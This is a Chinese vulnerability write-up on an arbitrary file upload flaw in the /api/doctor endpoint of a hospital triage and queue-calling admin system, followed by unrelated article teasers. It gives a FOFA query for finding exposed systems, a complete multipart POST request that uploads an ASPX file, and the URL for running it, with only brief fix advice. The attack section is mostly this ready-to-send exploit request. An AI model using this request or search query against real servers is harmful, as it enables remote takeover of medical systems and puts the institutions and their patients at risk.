北京神州分诊叫号系统 doctor 任意文件上传漏洞

embedded/2024/10/31 13:51:39/

0x01 产品描述:

        ‌北京神州视翰科技有限公司的分诊叫号后台系统‌是一个集成了多种功能的综合管理系统,旨在提升医疗机构的分诊和叫号效率,优化患者就医体验。
0x02 漏洞描述:

        北京神州分诊叫号系统在/doctor接口处存在任意文件上传,攻击者可通过该漏洞在上传任意文件至服务器上从而实现远程接管。
0x03 搜索语句:

Fofa:title="分诊叫号后台"


0x04 漏洞复现:

POST /api/doctor/ HTTP/1.1
Host: your-ip
Content-Length: 756
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKZ5OA1LLddPA4mKc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: need_login=
Connection: close------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="doctorid"0
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="login_id"001.aspx
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="name"22
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="title"23
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="department"24
------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="description"------WebKitFormBoundaryKZ5OA1LLddPA4mKc
Content-Disposition: form-data; name="icon"; filename="11.txt"
Content-Type: text/aspx<%@ Page Language="C#"%><% Response.Write(123);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
------WebKitFormBoundaryKZ5OA1LLddPA4mKc--

拼接访问路径:

http://your-ip/Web/images/001.aspx


0x05 修复建议:

        首先确保系统限制了文件所必须的上传后缀,然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串,同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。


http://www.ppmy.cn/embedded/133881.html

相关文章

solidity的struct对象,web3j java解析输出参数

solidity的struct对象&#xff0c;web3j java解析输出参数 先决条件 // SPDX-License-Identifier: MIT pragma solidity 0.8.28;contract StructDemo {struct Student {uint256 id;string name;}// 初始化一个结构体Student public student;function initStudent5(Student me…

Redis主从复制入门

文章目录 配置主服务器配置从服务器常用命令使用示例 Redis 主从复制是一种数据复制机制&#xff0c;它允许将一个 Redis 服务器的数据复制到多个其他 Redis 服务器。这种机制可以用来实现读写分离、提高系统的可用性和容错性。以下是与 Redis 主从复制相关的命令及其使用方法&…

RHCE http作业

配置nginx服务通过ip访问多网站 1.前提配置 关防火墙 关selinux 2.安装web服务程序nginx 保存并退出 #ip a 3.当前主机添加多地址 4.自定义nginx配置文件通过多地址区分多网站 /etc/nginx/conf.d/test_ip.conf server { #标记为一个虚拟主机 } 5.根据配置在主机创建数据文件 …

微服务设计模式 - 大使模式(Ambassador Pattern)

微服务设计模式 - 大使模式&#xff08;Ambassador Pattern&#xff09; 微服务设计模式 - 大使模式&#xff08;Ambassador Pattern&#xff09; 定义结构工作过程优点使用场景示例代码总结 定义 Ambassador Pattern 是一种常见的微服务设计模式&#xff0c;通常用于在微服…

队列的介绍

队列的定义 队列&#xff08;Queue&#xff09;是一种特殊的线性表&#xff0c;它遵循先进先出&#xff08;First In First Out&#xff0c;FIFO&#xff09;的原则。就像人们在排队等候一样&#xff0c;先进入队列的元素先被处理。队列有两个基本操作端&#xff1a;队头&…

NFS服务器

一.NFS简介 NFS&#xff08;Network File System&#xff0c;网络文件系统&#xff09;是FreeBSD支持的文件系统中的一种&#xff0c;它允许网络中的计算机&#xff08;不同的计算机、不同的操作系统&#xff09;之间通过TCP/IP网络共享资源.本地NFS的客户端应用可以透明地读写…

Python小游戏17——飞机大战

运行结果 首先&#xff0c;你需要安装Pygame库。如果你还没有安装它&#xff0c;可以使用以下命令来安装&#xff1a; bash pip install pygame 代码&#xff1a; python import pygame import random # 初始化Pygame pygame.init() # 屏幕大小 SCREEN_WIDTH 800 SCREEN_HEIGH…

【Linux】mnt命名空间-操作

先来认识一个命令行工具 unshare。unshare 是 util-linux 工具包中的一个工具&#xff0c;CentOS 7 系统默认已经集成了该工具&#xff0c;使用 unshare 命令可以实现创建并访问不同类型的 Namespace。 查看所有命名空间&#xff0c;type是命名空间类型 Mnt命名空间 创建一个mn…